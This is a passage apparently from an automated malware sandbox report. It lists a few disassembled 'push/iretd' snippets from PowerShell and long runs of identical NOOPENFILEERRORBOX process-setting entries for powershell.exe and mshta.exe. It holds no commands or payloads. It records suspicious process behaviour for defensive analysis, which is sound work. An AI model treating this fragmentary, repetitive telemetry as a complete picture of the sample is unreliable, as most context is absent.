Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00769B11 push A7A807D0h; iretd 6_2_00769B1E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06F316A0 pushad ; iretd 6_2_06F31D39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06F32480 push edx; iretd 6_2_06F32586
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06F34400 push eax; iretd 6_2_06F34636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06F3416D push ebx; iretd 6_2_06F3417E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06F31E55 pushad ; iretd 6_2_06F31E6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
